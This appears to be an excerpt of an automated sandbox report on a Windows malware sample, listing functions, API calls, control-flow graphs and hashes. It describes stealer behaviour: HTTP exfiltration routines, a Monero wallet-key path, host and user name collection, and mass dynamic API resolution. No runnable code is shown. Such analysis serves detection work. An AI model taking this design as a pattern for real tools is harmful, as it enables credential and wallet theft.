                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 5267c76bc1066b1b1cfbd333713c56058787d93fa972a6282be88887632d4081
                                  • Instruction ID: b949b8c039a067d1c1c5b50c2242958668543f0c1b139017a0c1018f4f7bbb87
                                  • Opcode Fuzzy Hash: 5267c76bc1066b1b1cfbd333713c56058787d93fa972a6282be88887632d4081
                                  • Instruction Fuzzy Hash: 2C41CF60BD674CEACF3CBBA4884EF9DB6A65F42F40F5050D8AC055A3D0CBA075C8C626
                                  Function 00BA4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 801 ba4880-ba4942 call bba7a0 call ba47b0 call bba740 * 5 InternetOpenA StrCmpCA 816 ba494b-ba494f 801->816 817 ba4944 801->817 818 ba4ecb-ba4ef3 InternetCloseHandle call bbaad0 call ba9ac0 816->818 819 ba4955-ba4acd call bb8b60 call bba920 call bba8a0 call bba800 * 2 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba920 call bba8a0 call bba800 * 2 InternetConnectA 816->819 817->816 829 ba4f32-ba4fa2 call bb8990 * 2 call bba7a0 call bba800 * 8 818->829 830 ba4ef5-ba4f2d call bba820 call bba9b0 call bba8a0 call bba800 818->830 819->818 905 ba4ad3-ba4ad7 819->905 830->829 906 ba4ad9-ba4ae3 905->906 907 ba4ae5 905->907 908 ba4aef-ba4b22 HttpOpenRequestA 906->908 907->908 909 ba4b28-ba4e28 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba9b0 call bba8a0 call bba800 call bba920 call bba8a0 call bba800 call bba740 call bba920 * 2 call bba8a0 call bba800 * 2 call bbaad0 lstrlen call bbaad0 * 2 lstrlen call bbaad0 HttpSendRequestA 908->909 910 ba4ebe-ba4ec5 InternetCloseHandle 908->910 1021 ba4e32-ba4e5c InternetReadFile 909->1021 910->818 1022 ba4e5e-ba4e65 1021->1022 1023 ba4e67-ba4eb9 InternetCloseHandle call bba800 1021->1023 1022->1023 1024 ba4e69-ba4ea7 call bba9b0 call bba8a0 call bba800 1022->1024 1023->910 1024->1021
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA4915
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA4ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00BC0DDB,00000000,?,?,00000000,?,",00000000,?,01410F30), ref: 00BA4DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA4E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA4E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BA4E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4EC5
                                  • HttpOpenRequestA.WININET(00000000,01410F10,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA4B15
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA4ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: 0d987e3e7acb76768877fe59f2132379d890f86af9dde417b61f30f06729fc7e
                                  • Instruction ID: c8c66081db29907602f31d7de5c7b1da01d54a20285fae7122a0915c888d1673
                                  • Opcode Fuzzy Hash: 0d987e3e7acb76768877fe59f2132379d890f86af9dde417b61f30f06729fc7e
                                  • Instruction Fuzzy Hash: 6512B972D10218ABDB15EB94DCA2FEEB3B8AF55300F5041D9B10676491EFB02F49CB62
                                  Function 00BB78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00BB792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 56f07b810baa30808387e97e328d349b5bf0b9c0e9684f0009d09add8db6ae37
                                  • Instruction ID: d39cb4cea79bfa2b2d476225d7014f88f6cdcb2cb3e04d86a7f7c9f4df9c7bb6
                                  • Opcode Fuzzy Hash: 56f07b810baa30808387e97e328d349b5bf0b9c0e9684f0009d09add8db6ae37
                                  • Instruction Fuzzy Hash: 730186B1944345EBC710DF98DD85BAABBF8F744B11F10425AF545E7380D77459008BA1
                                  Function 00BB7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB7887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 68a9e680389fc7b18d3d17e431a48ab8a9f18f4d6f2bd125a1ad9e28efe65308
                                  • Instruction ID: 573d518373dcb92a6811db39b5977f375de20ab29e96b842bbd7226049a8a7d0
                                  • Opcode Fuzzy Hash: 68a9e680389fc7b18d3d17e431a48ab8a9f18f4d6f2bd125a1ad9e28efe65308
                                  • Instruction Fuzzy Hash: C6F044B1944249ABC710DF99DD89BAEBBB8E704711F10025AF605E2780C7B425048BA1
                                  Function 00BA1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: 00d963405c295c02cab0ce4956837b73b3b986c02ad6b3ce8b4141730c6f0b86
                                  • Instruction ID: 1abf6016add0b511cb7a4c33ce1164eeb8ee35e5ac3fc621ab2f10d563e961ab
                                  • Opcode Fuzzy Hash: 00d963405c295c02cab0ce4956837b73b3b986c02ad6b3ce8b4141730c6f0b86
                                  • Instruction Fuzzy Hash: 96D05E7490430DDBCB00FFE4D8896DDBBB8FB08312F000594E905B2340EA306481CAB6
                                  Function 00BB9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 bb9c10-bb9c1a 634 bb9c20-bba031 GetProcAddress * 43 633->634 635 bba036-bba0ca LoadLibraryA * 8 633->635 634->635 636 bba0cc-bba141 GetProcAddress * 5 635->636 637 bba146-bba14d 635->637 636->637 638 bba153-bba211 GetProcAddress * 8 637->638 639 bba216-bba21d 637->639 638->639 640 bba298-bba29f 639->640 641 bba21f-bba293 GetProcAddress * 5 639->641 642 bba337-bba33e 640->642 643 bba2a5-bba332 GetProcAddress * 6 640->643 641->640 644 bba41f-bba426 642->644 645 bba344-bba41a GetProcAddress * 9 642->645 643->642 646 bba428-bba49d GetProcAddress * 5 644->646 647 bba4a2-bba4a9 644->647 645->644 646->647 648 bba4ab-bba4d7 GetProcAddress * 2 647->648 649 bba4dc-bba4e3 647->649 648->649 650 bba515-bba51c 649->650 651 bba4e5-bba510 GetProcAddress * 2 649->651 652 bba612-bba619 650->652 653 bba522-bba60d GetProcAddress * 10 650->653 651->650 654 bba61b-bba678 GetProcAddress * 4 652->654 655 bba67d-bba684 652->655 653->652 654->655 656 bba69e-bba6a5 655->656 657 bba686-bba699 GetProcAddress 655->657 658 bba708-bba709 656->658 659 bba6a7-bba703 GetProcAddress * 4 656->659 657->656 659->658
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,013F5508), ref: 00BB9C2D
                                  • GetProcAddress.KERNEL32(76210000,013F54E8), ref: 00BB9C45
                                  • GetProcAddress.KERNEL32(76210000,0140A2C8), ref: 00BB9C5E
                                  • GetProcAddress.KERNEL32(76210000,0140A298), ref: 00BB9C76
                                  • GetProcAddress.KERNEL32(76210000,0140A2B0), ref: 00BB9C8E
                                  • GetProcAddress.KERNEL32(76210000,0140F170), ref: 00BB9CA7
                                  • GetProcAddress.KERNEL32(76210000,013FA838), ref: 00BB9CBF
                                  • GetProcAddress.KERNEL32(76210000,0140F1B8), ref: 00BB9CD7
                                  • GetProcAddress.KERNEL32(76210000,0140F260), ref: 00BB9CF0
                                  • GetProcAddress.KERNEL32(76210000,0140F248), ref: 00BB9D08
                                  • GetProcAddress.KERNEL32(76210000,0140F1E8), ref: 00BB9D20
                                  • GetProcAddress.KERNEL32(76210000,013F5528), ref: 00BB9D39
                                  • GetProcAddress.KERNEL32(76210000,013F5368), ref: 00BB9D51
                                  • GetProcAddress.KERNEL32(76210000,013F5628), ref: 00BB9D69
                                  • GetProcAddress.KERNEL32(76210000,013F5568), ref: 00BB9D82
                                  • GetProcAddress.KERNEL32(76210000,0140F1D0), ref: 00BB9D9A
                                  • GetProcAddress.KERNEL32(76210000,0140F2A8), ref: 00BB9DB2
                                  • GetProcAddress.KERNEL32(76210000,013FA860), ref: 00BB9DCB
                                  • GetProcAddress.KERNEL32(76210000,013F5588), ref: 00BB9DE3
                                  • GetProcAddress.KERNEL32(76210000,0140F158), ref: 00BB9DFB
                                  • GetProcAddress.KERNEL32(76210000,0140F230), ref: 00BB9E14
                                  • GetProcAddress.KERNEL32(76210000,0140F218), ref: 00BB9E2C
                                  • GetProcAddress.KERNEL32(76210000,0140F290), ref: 00BB9E44
                                  • GetProcAddress.KERNEL32(76210000,013F5388), ref: 00BB9E5D
                                  • GetProcAddress.KERNEL32(76210000,0140F278), ref: 00BB9E75
                                  • GetProcAddress.KERNEL32(76210000,0140F140), ref: 00BB9E8D
                                  • GetProcAddress.KERNEL32(76210000,0140F200), ref: 00BB9EA6
                                  • GetProcAddress.KERNEL32(76210000,0140F2C0), ref: 00BB9EBE
                                  • GetProcAddress.KERNEL32(76210000,0140F110), ref: 00BB9ED6
                                  • GetProcAddress.KERNEL32(76210000,0140F188), ref: 00BB9EEF
                                  • GetProcAddress.KERNEL32(76210000,0140F128), ref: 00BB9F07
                                  • GetProcAddress.KERNEL32(76210000,0140F1A0), ref: 00BB9F1F
                                  • GetProcAddress.KERNEL32(76210000,0140ED68), ref: 00BB9F38
                                  • GetProcAddress.KERNEL32(76210000,01400E00), ref: 00BB9F50
                                  • GetProcAddress.KERNEL32(76210000,0140EBD0), ref: 00BB9F68
                                  • GetProcAddress.KERNEL32(76210000,0140EB10), ref: 00BB9F81
                                  • GetProcAddress.KERNEL32(76210000,013F55C8), ref: 00BB9F99
                                  • GetProcAddress.KERNEL32(76210000,0140EBA0), ref: 00BB9FB1
                                  • GetProcAddress.KERNEL32(76210000,013F5648), ref: 00BB9FCA
                                  • GetProcAddress.KERNEL32(76210000,0140ECF0), ref: 00BB9FE2
                                  • GetProcAddress.KERNEL32(76210000,0140EDF8), ref: 00BB9FFA
                                  • GetProcAddress.KERNEL32(76210000,013F5608), ref: 00BBA013
                                  • GetProcAddress.KERNEL32(76210000,013F5668), ref: 00BBA02B
                                  • LoadLibraryA.KERNEL32(0140EC78,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA03D
                                  • LoadLibraryA.KERNEL32(0140EC48,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA04E
                                  • LoadLibraryA.KERNEL32(0140ECD8,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA060
                                  • LoadLibraryA.KERNEL32(0140EB28,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA072
                                  • LoadLibraryA.KERNEL32(0140EC60,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA083
                                  • LoadLibraryA.KERNEL32(0140EB40,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA095
                                  • LoadLibraryA.KERNEL32(0140EC90,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA0A7
                                  • LoadLibraryA.KERNEL32(0140EDB0,?,00BB5CA3,00BC0AEB,?,?,?,?,?,?,?,?,?,?,00BC0AEA,00BC0AE3), ref: 00BBA0B8
                                  • GetProcAddress.KERNEL32(751E0000,013F5068), ref: 00BBA0DA
                                  • GetProcAddress.KERNEL32(751E0000,0140EDC8), ref: 00BBA0F2
                                  • GetProcAddress.KERNEL32(751E0000,01409C90), ref: 00BBA10A
                                  • GetProcAddress.KERNEL32(751E0000,0140EB58), ref: 00BBA123
                                  • GetProcAddress.KERNEL32(751E0000,013F51C8), ref: 00BBA13B
                                  • GetProcAddress.KERNEL32(700F0000,013FA900), ref: 00BBA160
                                  • GetProcAddress.KERNEL32(700F0000,013F52E8), ref: 00BBA179
                                  • GetProcAddress.KERNEL32(700F0000,013FA450), ref: 00BBA191
                                  • GetProcAddress.KERNEL32(700F0000,0140EB70), ref: 00BBA1A9
                                  • GetProcAddress.KERNEL32(700F0000,0140ED80), ref: 00BBA1C2
                                  • GetProcAddress.KERNEL32(700F0000,013F5168), ref: 00BBA1DA
                                  • GetProcAddress.KERNEL32(700F0000,013F5328), ref: 00BBA1F2
                                  • GetProcAddress.KERNEL32(700F0000,0140ED08), ref: 00BBA20B
                                  • GetProcAddress.KERNEL32(753A0000,013F4F48), ref: 00BBA22C
                                  • GetProcAddress.KERNEL32(753A0000,013F5268), ref: 00BBA244
                                  • GetProcAddress.KERNEL32(753A0000,0140EC30), ref: 00BBA25D
                                  • GetProcAddress.KERNEL32(753A0000,0140ED20), ref: 00BBA275
                                  • GetProcAddress.KERNEL32(753A0000,013F50A8), ref: 00BBA28D
                                  • GetProcAddress.KERNEL32(76310000,013FA770), ref: 00BBA2B3
                                  • GetProcAddress.KERNEL32(76310000,013FA4A0), ref: 00BBA2CB
                                  • GetProcAddress.KERNEL32(76310000,0140ECA8), ref: 00BBA2E3
                                  • GetProcAddress.KERNEL32(76310000,013F5048), ref: 00BBA2FC
                                  • GetProcAddress.KERNEL32(76310000,013F5288), ref: 00BBA314
                                  • GetProcAddress.KERNEL32(76310000,013FA4C8), ref: 00BBA32C
                                  • GetProcAddress.KERNEL32(76910000,0140ECC0), ref: 00BBA352
                                  • GetProcAddress.KERNEL32(76910000,013F51A8), ref: 00BBA36A
                                  • GetProcAddress.KERNEL32(76910000,01409B90), ref: 00BBA382
                                  • GetProcAddress.KERNEL32(76910000,0140EDE0), ref: 00BBA39B
                                  • GetProcAddress.KERNEL32(76910000,0140EB88), ref: 00BBA3B3
                                  • GetProcAddress.KERNEL32(76910000,013F5248), ref: 00BBA3CB
                                  • GetProcAddress.KERNEL32(76910000,013F51E8), ref: 00BBA3E4
                                  • GetProcAddress.KERNEL32(76910000,0140EBB8), ref: 00BBA3FC
